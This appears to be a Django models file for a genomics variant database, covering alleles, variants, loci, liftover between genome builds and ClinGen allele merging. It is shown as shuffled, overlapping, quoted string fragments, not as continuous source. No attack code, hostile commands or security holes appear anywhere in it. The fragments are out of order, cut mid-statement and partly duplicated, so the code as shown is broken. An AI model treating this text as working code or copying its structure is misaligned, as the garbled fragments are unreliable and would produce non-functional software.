"cached result \"\"\" RECORDS_BASE_TABLE_NAMES = [\"snpdb_variantcollectionrecord\"] RECORDS_FK_FIELD_TO_THIS_MODEL = \"variant_collection_id\" PARTITION_LABEL_TEXT = \"variant_collection\" name",
"logging import re from typing import Optional, Pattern, Tuple, Iterable, Set import django.dispatch",
"vas.filter(genome_build=genome_build).first() if not va and not best_attempt: raise ValueError(f'Could not find a variant",
"variants in allele {self.id}') def get_liftover_variant_tuple(self, genome_build: GenomeBuild) -> Tuple[str, 'VariantCoordinate']: \"\"\" Used",
"object - instead do 1-to-1 \"\"\" # Some builds share contigs (eg GRCh37/38",
"-> Iterable['Variant']: allele = self.allele if not allele: return [self] return Variant.objects.filter(variantallele__allele=allele) def",
"\"locus__position\", \"locus__ref__seq\", \"alt__seq\"] return Variant.objects.get(locus__contig__genomebuildcontig__genome_build=genome_build, **dict(zip(params, variant_tuple))) @lazy def genome_builds(self) -> Set['GenomeBuild']: gbc_qs",
"return self.variantallelecollectionrecord_set.values_list(\"variant_allele\", flat=True) class VariantAlleleCollectionRecord(models.Model): collection = models.ForeignKey(VariantAlleleCollectionSource, on_delete=CASCADE) variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE)",
"@staticmethod def clean_variant_fields(chrom, position, ref, alt, want_chr): ref = ref.strip().upper() alt = alt.strip().upper()",
"collections.namedtuple('VariantCoordinate', 'chrom pos ref alt') class Sequence(models.Model): \"\"\" We want to guarantee seq",
"@property def start(self): return self.locus.position @property def end(self): return self.locus.position + max(self.locus.ref.length, self.alt.length)",
"representations \"\"\" if liftover_complete: v37 = self.variant_alleles().filter(genome_build=GenomeBuild.grch37()).first() v38 = self.variant_alleles().filter(genome_build=GenomeBuild.grch38()).first() if v37: self.close_open_flags_of_type(allele_flag_types.missing_37)",
"{self.pk}\" def validate(self, liftover_complete=True): \"\"\" :param liftover_complete: If False does not check for",
"ref, alt, abbreviate=False) -> str: if abbreviate: ref = Sequence.abbreviate(ref) alt = Sequence.abbreviate(alt)",
"f\"variantcollection_{self.pk}\" def get_annotation_kwargs(self): vcr_condition = Q(variantcollectionrecord__variant_collection=self) return {self.variant_collection_alias: FilteredRelation('variantcollectionrecord', condition=vcr_condition)} def get_q(self): if",
"self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_37, only_if_new=True) if v38: self.close_open_flags_of_type(allele_flag_types.missing_38) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_38, only_if_new=True) allele_validate_signal.send(sender=Allele, allele=self) @receiver(flag_collection_extra_info_signal, sender=FlagCollection) def",
"other_allele: raise ValueError(f\"Attempt to merge {self} to itself!\") can_merge = True merge_log_message =",
"related_name=\"old_allele_merge\", on_delete=CASCADE) new_allele = models.ForeignKey(Allele, related_name=\"new_allele_merge\", on_delete=CASCADE) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) success =",
"va.save() except IntegrityError: logging.warning(\"VariantAllele exists with allele/build/variant of %s/%s/%s - deleting this one\",",
"Variant.REFERENCE_ALT and self.locus.ref.length > self.alt.length @property def can_have_clingen_allele(self) -> bool: return self.is_standard_variant or",
"= models.ForeignKey(Variant, null=True, on_delete=CASCADE) # Optional, if got a variant but invalid error_message",
"= self.variant_alleles() va = None if genome_build: va = vas.filter(genome_build=genome_build).first() if not va",
"import Wiki from snpdb.models.flag_types import allele_flag_types from snpdb.models.models_clingen_allele import ClinGenAllele from snpdb.models.models_enums import",
"get_liftover_for_allele(allele, genome_build) -> Optional['Liftover']: \"\"\" Only works if liftover was done via VariantAlleleSource",
"return None @lazy def variants(self): return Variant.objects.filter(pk__in=self.variant_alleles().values_list('variant', flat=True)) def variant_for_build(self, genome_build: GenomeBuild, best_attempt=True)",
"= models.CharField(max_length=2, choices=AlleleConversionTool.choices) error = models.JSONField(null=True) # Only set on error class Meta:",
"None if g_hgvs: variant_tuple = get_hgvs_variant_tuple(g_hgvs, genome_build) return conversion_tool, variant_tuple def merge(self, conversion_tool,",
"that unique_together constraint We only expect to store Alleles for a small fraction",
"cases # we'll have the same variant linked through different VariantAlleles (so it",
"alt, abbreviate=False) -> str: if abbreviate: ref = Sequence.abbreviate(ref) alt = Sequence.abbreviate(alt) return",
"from model_utils.managers import InheritanceManager from flags.models import FlagCollection, flag_collection_extra_info_signal, FlagInfos from flags.models.models import",
"merge {self} to itself!\") can_merge = True merge_log_message = f\"{other_allele} merge into {self}\"",
"models.ForeignKey(GenomeBuild, null=True, on_delete=CASCADE, related_name=\"liftover_source_genome_build\") genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) # destination def get_allele_source(self) ->",
"return str(self) != self.full_string @lazy def full_string(self): \"\"\" No abbreviation \"\"\" return self.format_tuple(*self.as_tuple())",
"ref, alt class VariantWiki(Wiki): variant = models.OneToOneField(Variant, on_delete=CASCADE) class VariantAllele(TimeStampedModel): \"\"\" It's possible",
"LOCUS_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)$\", re.IGNORECASE) LOCUS_NO_REF_PATTERN = r\"^([^:]+):(\\d+)$\" VARIANT_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)>(=|[GATC]+)$\", re.IGNORECASE) allele_validate_signal =",
"on_delete=CASCADE) def get_genome_build(self): return self.genome_build def get_variants_qs(self): return Variant.objects.filter(variantallele__in=self.get_variant_allele_ids()) def get_variant_allele_ids(self): return self.variantallelecollectionrecord_set.values_list(\"variant_allele\",",
"if other_fc := other_allele.flag_collection: other_fc.flag_set.update(collection=self.flag_collection_safe) other_fc.flagwatch_set.update(flag_collection=self.flag_collection) existing_fc_cc_names = self.flag_collection.clinicalcontext_set.values_list(\"name\", flat=True) other_fc.clinicalcontext_set.exclude(name__in=existing_fc_cc_names).update(flag_collection=self.flag_collection) other_fc.classification_set.update(flag_collection=self.flag_collection) existing_allele_cc_names",
"({self.name})\" class VariantCollectionRecord(models.Model): variant_collection = models.ForeignKey(VariantCollection, on_delete=DO_NOTHING) # handled via drop partition variant",
"to add via migration \"\"\" seq = models.TextField() seq_md5_hash = models.CharField(max_length=32, unique=True) length",
"\"\"\" return self.format_tuple(*self.as_tuple()) def __str__(self): return self.format_tuple(self.locus.contig.name, self.locus.position, self.locus.ref, self.alt) def get_absolute_url(self): #",
"class VariantAlleleCollectionSource(AlleleSource): genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) def get_genome_build(self): return self.genome_build def get_variants_qs(self): return",
"# we'll have the same variant linked through different VariantAlleles (so it can't",
"GRCh38 variants for same change point to same allele This is generally done",
"User, **kwargs): # pylint: disable=unused-argument alleles = Allele.objects.filter(flag_collection__in=flag_infos.ids) allele: Allele for allele in",
"[GATCN] (ie not special or reference) \"\"\" # locus.ref should always be standard...",
"validate(self, liftover_complete=True): \"\"\" :param liftover_complete: If False does not check for missing representations",
"import DbSNP from genes.hgvs import get_hgvs_variant_tuple # Check if the other build shares",
"through different VariantAlleles (so it can't be 1-to-1) variant = models.ForeignKey(Variant, on_delete=CASCADE) genome_build",
"\"\"\" Liftover pipeline involves reading through a VCF where ID is set to",
"self.variant_allele.genome_build def get_variants_qs(self): return Variant.objects.filter(variantallele=self.variant_allele) @staticmethod def get_liftover_for_allele(allele, genome_build) -> Optional['Liftover']: \"\"\" Only",
"s = f\"{s[:3]}...{s[-3:]}\" return s def __str__(self): return self.abbreviate(self.seq) @staticmethod def get_pk_by_seq(q=None): qs",
"from django.dispatch import receiver from django.urls.base import reverse from django_extensions.db.models import TimeStampedModel from",
"\"\"\" old_allele = models.ForeignKey(Allele, related_name=\"old_allele_merge\", on_delete=CASCADE) new_allele = models.ForeignKey(Allele, related_name=\"new_allele_merge\", on_delete=CASCADE) conversion_tool =",
"variant.end_position >= start \"\"\" annotation_kwargs = {\"longest_sequence\": Greatest(\"locus__ref__length\", \"alt__length\"), \"end_position\": F(\"locus__position\") + F(\"longest_sequence\")}",
"done via ClinGen Allele Registry, but sometimes that can fail. Linked against Variant",
"return self.locus.position @property def end(self): return self.locus.position + max(self.locus.ref.length, self.alt.length) @staticmethod def clean_variant_fields(chrom,",
"Variant for a given locus/alt per database (handled via insertion queues) \"\"\" REFERENCE_ALT",
"= AlleleConversionTool.DBSNP variant_tuple = None if g_hgvs: variant_tuple = get_hgvs_variant_tuple(g_hgvs, genome_build) return conversion_tool,",
"alleles for liftover pipelines. \"\"\" objects = InheritanceManager() def get_genome_build(self): return None def",
"return Variant.objects.filter(variantallele=self.variant_allele) @staticmethod def get_liftover_for_allele(allele, genome_build) -> Optional['Liftover']: \"\"\" Only works if liftover",
"4 groups, returns (chrom, position, ref, alt) \"\"\" variant_tuple = None if m",
"lazy from model_utils.managers import InheritanceManager from flags.models import FlagCollection, flag_collection_extra_info_signal, FlagInfos from flags.models.models",
"show allele if there is one, otherwise go to variant page return reverse('view_allele',",
">= start \"\"\" annotation_kwargs = {\"longest_sequence\": Greatest(\"locus__ref__length\", \"alt__length\"), \"end_position\": F(\"locus__position\") + F(\"longest_sequence\")} q",
"to retrieve in all builds, but at least one # links there, and",
"max_length: int = 20): if len(s) > max_length: s = f\"{s[:3]}...{s[-3:]}\" return s",
"= models.JSONField(null=True) # Only set on error class Meta: unique_together = (\"variant\", \"genome_build\",",
"for build {genome_build}') if not va: va = vas.first() if va: return va.variant",
"\"\"\" Used by to write VCF coordinates during liftover. Can be slow (API",
"is unique (so Locus/Variant can have unique constraints) Postgres by default uses indexes",
"and GRCh38 variants for same change point to same allele This is generally",
"A set of variants - usually used as a cached result \"\"\" RECORDS_BASE_TABLE_NAMES",
"import collections import logging import re from typing import Optional, Pattern, Tuple, Iterable,",
"in genome_build_contigs: conversion_tool = AlleleConversionTool.SAME_CONTIG variant_tuple = variant_allele.variant.as_tuple() return conversion_tool, variant_tuple conversion_tool =",
"def canonical_c_hgvs(self): return self.variant.get_canonical_c_hgvs(self.genome_build) def needs_clingen_call(self): if settings.CLINGEN_ALLELE_REGISTRY_LOGIN and self.allele.clingen_allele is None: if",
"\"\"\" if self == other_allele: raise ValueError(f\"Attempt to merge {self} to itself!\") can_merge",
"True merge_log_message = f\"{other_allele} merge into {self}\" other_clingen_allele = other_allele.clingen_allele if other_clingen_allele and",
"return self.abbreviate(self.seq) @staticmethod def get_pk_by_seq(q=None): qs = Sequence.objects.all() if q: qs = qs.filter(q)",
"bug to have the same 3 variant/build/allele so we can add that unique_together",
"be 1-to-1) variant = models.ForeignKey(Variant, on_delete=CASCADE) genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) allele = models.ForeignKey(Allele,",
"Some builds share contigs (eg GRCh37/38 share MT and some unplaced scaffolds) -",
"unique (so Locus/Variant can have unique constraints) Postgres by default uses indexes for",
"return self.variant.get_canonical_c_hgvs(self.genome_build) def needs_clingen_call(self): if settings.CLINGEN_ALLELE_REGISTRY_LOGIN and self.allele.clingen_allele is None: if self.error: #",
"-> 'Variant': params = [\"locus__contig__name\", \"locus__position\", \"locus__ref__seq\", \"alt__seq\"] return Variant.objects.get(locus__contig__genomebuildcontig__genome_build=genome_build, **dict(zip(params, variant_tuple))) @lazy",
"ValueError: return None @lazy def grch38(self) -> Optional['Variant']: try: return self.variant_for_build(genome_build=GenomeBuild.grch38(), best_attempt=False) except",
"@staticmethod def get_overlap_annotate_and_q(contig, start, end): \"\"\" Query handling indels. Contigs must match and",
"va: return va.allele return None @property def equivalent_variants(self) -> Iterable['Variant']: allele = self.allele",
"Allele for allele in alleles: flag_infos.set_extra_info(allele.flag_collection_id, { 'label': f'Allele {allele.id}' }, source_object=allele) class",
"models.ForeignKey(Locus, on_delete=CASCADE) alt = models.ForeignKey(Sequence, on_delete=CASCADE) class Meta: unique_together = (\"locus\", \"alt\") @staticmethod",
"qs.annotate(**kwargs) @staticmethod def format_tuple(chrom, position, ref, alt, abbreviate=False) -> str: if abbreviate: ref",
"Q(locus__contig__ucsc_name__iexact=chrom) @staticmethod def get_contigs_q(genome_build: GenomeBuild): \"\"\" Restrict to contigs in a genome build",
"return False def __str__(self): return f\"{self.allele} - {self.variant_id}({self.genome_build}/{self.conversion_tool})\" class VariantCollection(RelatedModelsPartitionModel): \"\"\" A set",
"Postgres by default uses indexes for constraints, and large TextFields give error of:",
"\"\"\" Genome build independent - ie GRCh37 and GRCh38 variants for same change",
"# Various contig errors all subclass from this pass if g_hgvs is None:",
"Iterable['Variant']: allele = self.allele if not allele: return [self] return Variant.objects.filter(variantallele__allele=allele) def get_canonical_transcript_annotation(self,",
"Meta: unique_together = (\"variant\", \"genome_build\", \"allele\") @property def canonical_c_hgvs(self): return self.variant.get_canonical_c_hgvs(self.genome_build) def needs_clingen_call(self):",
"but at least one # links there, and can't have another, so it'll",
"variant_for_build(self, genome_build: GenomeBuild, best_attempt=True) -> 'Variant': vas = self.variant_alleles() va = None if",
"locus for the row) There is only 1 Variant for a given locus/alt",
"should always be standard... return self.alt.is_standard_sequence() @property def is_indel(self) -> bool: return self.alt.seq",
"re.IGNORECASE) LOCUS_NO_REF_PATTERN = r\"^([^:]+):(\\d+)$\" VARIANT_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)>(=|[GATC]+)$\", re.IGNORECASE) allele_validate_signal = django.dispatch.Signal(providing_args=[\"allele\"]) class Allele(FlagsMixin,",
"Sequence(models.Model): \"\"\" We want to guarantee seq is unique (so Locus/Variant can have",
"other_fc.clinicalcontext_set.exclude(name__in=existing_fc_cc_names).update(flag_collection=self.flag_collection) other_fc.classification_set.update(flag_collection=self.flag_collection) existing_allele_cc_names = self.clinicalcontext_set.values_list(\"name\", flat=True) other_allele.clinicalcontext_set.exclude(name__in=existing_allele_cc_names).update(allele=self) for va in other_allele.variantallele_set.all(): try: va.allele",
"position, ref, alt, abbreviate=False) -> str: if abbreviate: ref = Sequence.abbreviate(ref) alt =",
"- ie GRCh37 and GRCh38 variants for same change point to same allele",
"Greatest(\"locus__ref__length\", \"alt__length\"), \"end_position\": F(\"locus__position\") + F(\"longest_sequence\")} q = Q(locus__contig=contig, locus__position__lte=end, end_position__gte=start) return annotation_kwargs,",
"UploadedFile for the UploadPipeline \"\"\" user = models.ForeignKey(User, on_delete=CASCADE) allele_source = models.ForeignKey(AlleleSource, on_delete=CASCADE)",
"Meta: unique_together = (\"contig\", \"position\", \"ref\") @property def chrom(self): return self.contig.name def __str__(self):",
"# Only set on error class Meta: unique_together = (\"variant\", \"genome_build\", \"allele\") @property",
"= models.ForeignKey(Liftover, on_delete=CASCADE) allele = models.ForeignKey(Allele, on_delete=CASCADE) variant = models.ForeignKey(Variant, null=True, on_delete=CASCADE) #",
"has to have 4 groups, returns (chrom, position, ref, alt) \"\"\" variant_tuple =",
"= md5sum_str(self.seq) super().save(force_insert=force_insert, force_update=force_update, using=using, update_fields=update_fields) @staticmethod def abbreviate(s: str, max_length: int =",
"Alleles for a small fraction of Variants So don't want them on the",
"into this allele \"\"\" if self == other_allele: raise ValueError(f\"Attempt to merge {self}",
"try: return Variant.get_from_tuple(variant_tuple, genome_build) except Variant.DoesNotExist: return None @staticmethod def get_from_tuple(variant_tuple: VariantCoordinate, genome_build:",
"= f\"from {self.source_genome_build.name} \" return f\"Liftover {source}to {self.genome_build} via {self.get_conversion_tool_display()}\" class LiftoverError(models.Model): liftover",
"Meta: unique_together = (\"locus\", \"alt\") @staticmethod def get_chrom_q(chrom): return Q(locus__contig__name__iexact=chrom) | Q(locus__contig__ucsc_name__iexact=chrom) @staticmethod",
"message=merge_log_message) if can_merge: if other_clingen_allele: # Move across ClinGen Allele (may not have",
"same locus) There is only 1 Locus for a given chrom/position/ref per database",
"= models.ForeignKey(VariantAlleleCollectionSource, on_delete=CASCADE) variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE) class Liftover(TimeStampedModel): \"\"\" Liftover pipeline involves",
"= vas.first() if va: return va.variant raise ValueError(f'Could not find any variants in",
"except ValueError: # Various contig errors all subclass from this pass if g_hgvs",
"!= Variant.REFERENCE_ALT and self.locus.ref.length < self.alt.length @property def is_deletion(self) -> bool: return self.alt.seq",
"build, use variant_for_build(genome_build).as_tuple() \"\"\" from snpdb.models.models_dbsnp import DbSNP from genes.hgvs import get_hgvs_variant_tuple #",
"different VariantAlleles (so it can't be 1-to-1) variant = models.ForeignKey(Variant, on_delete=CASCADE) genome_build =",
"for constraints, and large TextFields give error of: \"index row requires x bytes,",
"instead do 1-to-1 \"\"\" # Some builds share contigs (eg GRCh37/38 share MT",
"error class Meta: unique_together = (\"variant\", \"genome_build\", \"allele\") @property def canonical_c_hgvs(self): return self.variant.get_canonical_c_hgvs(self.genome_build)",
"build shares existing contig genome_build_contigs = set(c.pk for c in genome_build.chrom_contig_mappings.values()) for variant_allele",
"re.IGNORECASE) allele_validate_signal = django.dispatch.Signal(providing_args=[\"allele\"]) class Allele(FlagsMixin, models.Model): \"\"\" Genome build independent - ie",
"build \"\"\" return Q(locus__contig__genomebuildcontig__genome_build=genome_build) @staticmethod def get_no_reference_q(): return ~Q(alt__seq=Variant.REFERENCE_ALT) @staticmethod def get_overlap_annotate_and_q(contig, start,",
"-> VariantCoordinate: locus = self.locus contig = locus.contig return VariantCoordinate(chrom=contig.name, pos=locus.position, ref=locus.ref.seq, alt=self.alt.seq)",
"it'll work) other_allele.clingen_allele = None other_allele.save() self.clingen_allele = other_clingen_allele self.save() if other_fc :=",
"likely. It's a bug to have the same 3 variant/build/allele so we can",
"return None @staticmethod def get_from_tuple(variant_tuple: VariantCoordinate, genome_build: GenomeBuild) -> 'Variant': params = [\"locus__contig__name\",",
"can_merge @property def build_names(self) -> str: return \", \".join(sorted(self.variantallele_set.values_list(\"genome_build__name\", flat=True))) def __str__(self): name",
"\"\"\" allele_sources_qs = VariantAlleleSource.objects.filter(variant_allele__allele=allele) return Liftover.objects.filter(allele_source__in=allele_sources_qs, genome_build=genome_build).first() class VariantAlleleCollectionSource(AlleleSource): genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE)",
"same genome build to resolve to the same allele (due to our normalization",
"ValueError(f'Could not find any variants in allele {self.id}') def get_liftover_variant_tuple(self, genome_build: GenomeBuild) ->",
"in the build being used by ClinGen) - but it's not likely. It's",
"(\"variant\", \"genome_build\", \"allele\") @property def canonical_c_hgvs(self): return self.variant.get_canonical_c_hgvs(self.genome_build) def needs_clingen_call(self): if settings.CLINGEN_ALLELE_REGISTRY_LOGIN and",
"a query \"\"\" kwargs = {name: Concat(f\"{path_to_variant}locus__contig__name\", V(\":\"), f\"{path_to_variant}locus__position\", V(\" \"), f\"{path_to_variant}locus__ref__seq\", V(\">\"),",
"in gbc_qs} @lazy def coordinate(self) -> VariantCoordinate: locus = self.locus contig = locus.contig",
"Retry if server was down return self.error.get(\"errorType\") == ClinGenAllele.CLINGEN_ALLELE_SERVER_ERROR_TYPE return True return False",
"get_from_tuple(variant_tuple: VariantCoordinate, genome_build: GenomeBuild) -> 'Variant': params = [\"locus__contig__name\", \"locus__position\", \"locus__ref__seq\", \"alt__seq\"] return",
"only contains G/A/T/C/N \"\"\" return not re.match(r\"[^GATCN]\", self.seq) class Locus(models.Model): \"\"\" 1 per",
"MT and some unplaced scaffolds) - in those cases # we'll have the",
"(NCBI Remap) we need to write the source genome build VCF first Alleles",
"return self.is_standard_variant or self.is_reference @property def can_have_annotation(self) -> bool: return self.is_standard_variant def as_tuple(self)",
"allele = models.ForeignKey(Allele, on_delete=CASCADE) variant = models.ForeignKey(Variant, null=True, on_delete=CASCADE) # Optional, if got",
"result \"\"\" RECORDS_BASE_TABLE_NAMES = [\"snpdb_variantcollectionrecord\"] RECORDS_FK_FIELD_TO_THIS_MODEL = \"variant_collection_id\" PARTITION_LABEL_TEXT = \"variant_collection\" name =",
"= Sequence.objects.all() if q: qs = qs.filter(q) return dict(qs.values_list(\"seq\", \"pk\")) def is_standard_sequence(self): \"\"\"",
"models.ForeignKey(Sequence, on_delete=CASCADE) class Meta: unique_together = (\"contig\", \"position\", \"ref\") @property def chrom(self): return",
"is_ref_alt_reference(ref, alt): return ref == alt or alt == '.' @property def is_reference(self)",
"c_hgvs = cta.hgvs_c return c_hgvs @property def start(self): return self.locus.position @property def end(self):",
"contigs (eg GRCh37/38 share MT and some unplaced scaffolds) - in those cases",
"some unplaced scaffolds) - in those cases # we'll have the same variant",
"we can write the VCF in the desired genome build For others (NCBI",
"the same genome build to resolve to the same allele (due to our",
"self.locus.position, self.locus.ref.seq, self.alt.seq def is_abbreviated(self): return str(self) != self.full_string @lazy def full_string(self): \"\"\"",
"bool: return self.alt.seq == self.REFERENCE_ALT @property def is_standard_variant(self) -> bool: \"\"\" Variant alt",
"{self.ref}\" class Variant(models.Model): \"\"\" Variants represent the different alleles at a locus Usually",
"\"index row requires x bytes, maximum size is 8191\" The easiest solution is",
"on_delete=CASCADE) class Meta: unique_together = (\"locus\", \"alt\") @staticmethod def get_chrom_q(chrom): return Q(locus__contig__name__iexact=chrom) |",
"allele: return [self] return Variant.objects.filter(variantallele__allele=allele) def get_canonical_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version",
"+= f\" ({self.clingen_allele})\" return name def __format__(self, format_spec: str): if format_spec == 'CA'",
"f\"{path_to_variant}locus__ref__seq\", V(\">\"), f\"{path_to_variant}alt__seq\", output_field=TextField())} return qs.annotate(**kwargs) @staticmethod def format_tuple(chrom, position, ref, alt, abbreviate=False)",
"-> Optional['Variant']: try: return self.variant_for_build(genome_build=GenomeBuild.grch37(), best_attempt=False) except ValueError: return None @lazy def grch38(self)",
"1-to-1) variant = models.ForeignKey(Variant, on_delete=CASCADE) genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) allele = models.ForeignKey(Allele, on_delete=CASCADE)",
"-> FlagTypeContext: return FlagTypeContext.objects.get(pk=\"allele\") @lazy def clingen_error(self): error = None if va :=",
"Value as V, QuerySet, F from django.db.models.deletion import CASCADE, DO_NOTHING from django.db.models.fields import",
"to the same locus for the row) There is only 1 Variant for",
"def allele(self) -> Optional[Allele]: va = VariantAllele.objects.filter(variant=self).first() if va: return va.allele return None",
"go to variant page return reverse('view_allele', kwargs={\"pk\": self.id}) def flag_type_context(self) -> FlagTypeContext: return",
"get_variant_allele_ids(self): return self.variantallelecollectionrecord_set.values_list(\"variant_allele\", flat=True) class VariantAlleleCollectionRecord(models.Model): collection = models.ForeignKey(VariantAlleleCollectionSource, on_delete=CASCADE) variant_allele = models.ForeignKey(VariantAllele,",
"only 1 Locus for a given chrom/position/ref per database (handled via insertion queues)",
"IntegrityError: logging.warning(\"VariantAllele exists with allele/build/variant of %s/%s/%s - deleting this one\", va.allele, va.genome_build,",
"There is only 1 Locus for a given chrom/position/ref per database (handled via",
"ref, alt) \"\"\" variant_tuple = None if m := regex_pattern.match(variant_string): chrom, position, ref,",
"clingen_allele = models.OneToOneField(ClinGenAllele, null=True, on_delete=CASCADE) def get_absolute_url(self): # will show allele if there",
"Allele.objects.filter(variantallele__variant__in=self.get_variants_qs()) def liftover_complete(self, genome_build: GenomeBuild): \"\"\" This is called at the end of",
"in a VCF file (ref + >= 1 alts pointing to the same",
"GenomeBuild, regex_pattern: Pattern[str] = VARIANT_PATTERN) -> VariantCoordinate: \"\"\" regex_pattern - has to have",
"pos=locus.position, ref=locus.ref.seq, alt=self.alt.seq) @staticmethod def is_ref_alt_reference(ref, alt): return ref == alt or alt",
"settings from django.contrib.auth.models import User from django.db import models, IntegrityError from django.db.models import",
"flags.models.models import FlagsMixin, FlagTypeContext from library.django_utils.django_partition import RelatedModelsPartitionModel from library.genomics import format_chrom from",
"variant_tuple = None if g_hgvs: variant_tuple = get_hgvs_variant_tuple(g_hgvs, genome_build) return conversion_tool, variant_tuple def",
"build being used by ClinGen) - but it's not likely. It's a bug",
"False def __str__(self): return f\"{self.allele} - {self.variant_id}({self.genome_build}/{self.conversion_tool})\" class VariantCollection(RelatedModelsPartitionModel): \"\"\" A set of",
"point to the same locus) There is only 1 Locus for a given",
"if va is None: raise ValueError(\"Allele contains no VariantAlleles at all! Cannot liftover\")",
"variant = models.ForeignKey(Variant, on_delete=CASCADE) class AlleleSource(models.Model): \"\"\" Provides a source of alleles for",
"<= end AND variant.end_position >= start \"\"\" annotation_kwargs = {\"longest_sequence\": Greatest(\"locus__ref__length\", \"alt__length\"), \"end_position\":",
"ref alt') class Sequence(models.Model): \"\"\" We want to guarantee seq is unique (so",
"return Allele.objects.filter(variantallele__variant__in=self.get_variants_qs()) def liftover_complete(self, genome_build: GenomeBuild): \"\"\" This is called at the end",
"True return False def __str__(self): return f\"{self.allele} - {self.variant_id}({self.genome_build}/{self.conversion_tool})\" class VariantCollection(RelatedModelsPartitionModel): \"\"\" A",
"and some unplaced scaffolds) - in those cases # we'll have the same",
"PARTITION_LABEL_TEXT = \"variant_collection\" name = models.TextField(null=True) count = models.IntegerField(null=True) status = models.CharField(max_length=1, choices=ProcessingStatus.choices,",
"VariantAllele(TimeStampedModel): \"\"\" It's possible for multiple variants from the same genome build to",
"raise ValueError(f'Could not find a variant in allele {self.id} for build {genome_build}') if",
"only_if_new=True) allele_validate_signal.send(sender=Allele, allele=self) @receiver(flag_collection_extra_info_signal, sender=FlagCollection) def get_extra_info(flag_infos: FlagInfos, user: User, **kwargs): # pylint:",
"q @staticmethod def annotate_variant_string(qs, name=\"variant_string\", path_to_variant=\"\"): \"\"\" Return a \"1:123321 G>C\" style string",
"self.allele if not allele: return [self] return Variant.objects.filter(variantallele__allele=allele) def get_canonical_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']:",
"else: return f\"Allele {self.pk}\" def validate(self, liftover_complete=True): \"\"\" :param liftover_complete: If False does",
"\"\" if self.source_genome_build: source = f\"from {self.source_genome_build.name} \" return f\"Liftover {source}to {self.genome_build} via",
"import format_chrom from library.utils import md5sum_str from snpdb.models import Wiki from snpdb.models.flag_types import",
"InheritanceManager() def get_genome_build(self): return None def get_variants_qs(self): return Variant.objects.none() def get_allele_qs(self): return Allele.objects.filter(variantallele__variant__in=self.get_variants_qs())",
"standard [GATCN] (ie not special or reference) \"\"\" # locus.ref should always be",
"to write the source genome build VCF first Alleles must have already been",
"{\"longest_sequence\": Greatest(\"locus__ref__length\", \"alt__length\"), \"end_position\": F(\"locus__position\") + F(\"longest_sequence\")} q = Q(locus__contig=contig, locus__position__lte=end, end_position__gte=start) return",
"self.alt.length) @staticmethod def clean_variant_fields(chrom, position, ref, alt, want_chr): ref = ref.strip().upper() alt =",
"on_delete=CASCADE) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) success = models.BooleanField(default=True) message = models.TextField(null=True) VariantCoordinate =",
"\"\"\" We want to guarantee seq is unique (so Locus/Variant can have unique",
"FlagCollection, flag_collection_extra_info_signal, FlagInfos from flags.models.models import FlagsMixin, FlagTypeContext from library.django_utils.django_partition import RelatedModelsPartitionModel from",
"Various contig errors all subclass from this pass if g_hgvs is None: if",
"only_if_new=True) if v38: self.close_open_flags_of_type(allele_flag_types.missing_38) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_38, only_if_new=True) allele_validate_signal.send(sender=Allele, allele=self) @receiver(flag_collection_extra_info_signal, sender=FlagCollection) def get_extra_info(flag_infos:",
"ClinGen or 2 loci in a genome build being represented by 1 loci",
"self.format_tuple(*self.as_tuple()) def __str__(self): return self.format_tuple(self.locus.contig.name, self.locus.position, self.locus.ref, self.alt) def get_absolute_url(self): # will show",
"{self.pk} ({self.name})\" class VariantCollectionRecord(models.Model): variant_collection = models.ForeignKey(VariantCollection, on_delete=DO_NOTHING) # handled via drop partition",
"-> 'Variant': vas = self.variant_alleles() va = None if genome_build: va = vas.filter(genome_build=genome_build).first()",
"if va: return va.variant raise ValueError(f'Could not find any variants in allele {self.id}')",
"\"\"\" return not re.match(r\"[^GATCN]\", self.seq) class Locus(models.Model): \"\"\" 1 per line in a",
"the same variant linked through different VariantAlleles (so it can't be 1-to-1) variant",
"(eg ClinGen AlleleRegistry) we can write the VCF in the desired genome build",
"installing the btree_gist extension (requires postgres Admin rights). Django 3 has ExclusionConstraint, Postgres",
"= models.ForeignKey(GenomeBuild, on_delete=CASCADE) def get_genome_build(self): return self.genome_build def get_variants_qs(self): return Variant.objects.filter(variantallele__in=self.get_variant_allele_ids()) def get_variant_allele_ids(self):",
"(due to our normalization not being the same as ClinGen or 2 loci",
"__str__(self): return self.format_tuple(self.locus.contig.name, self.locus.position, self.locus.ref, self.alt) def get_absolute_url(self): # will show allele if",
"= f\"Error performing {merge_log_message}: both have ClinGen Alleles!\" AlleleMergeLog.objects.create(old_allele=other_allele, new_allele=self, conversion_tool=conversion_tool, success=can_merge, message=merge_log_message)",
"Variants represent the different alleles at a locus Usually 2+ per line in",
"return Q(locus__contig__name__iexact=chrom) | Q(locus__contig__ucsc_name__iexact=chrom) @staticmethod def get_contigs_q(genome_build: GenomeBuild): \"\"\" Restrict to contigs in",
"'label': f'Allele {allele.id}' }, source_object=allele) class AlleleMergeLog(TimeStampedModel): \"\"\" Keep track of calls to",
"def get_variants_qs(self): return Variant.objects.filter(variantallele=self.variant_allele) @staticmethod def get_liftover_for_allele(allele, genome_build) -> Optional['Liftover']: \"\"\" Only works",
"merge into {self}\" other_clingen_allele = other_allele.clingen_allele if other_clingen_allele and self.clingen_allele: can_merge = False",
"new_allele=self, conversion_tool=conversion_tool, success=can_merge, message=merge_log_message) if can_merge: if other_clingen_allele: # Move across ClinGen Allele",
"not have been possible to retrieve in all builds, but at least one",
"given chrom/position/ref per database (handled via insertion queues) \"\"\" contig = models.ForeignKey(Contig, on_delete=CASCADE)",
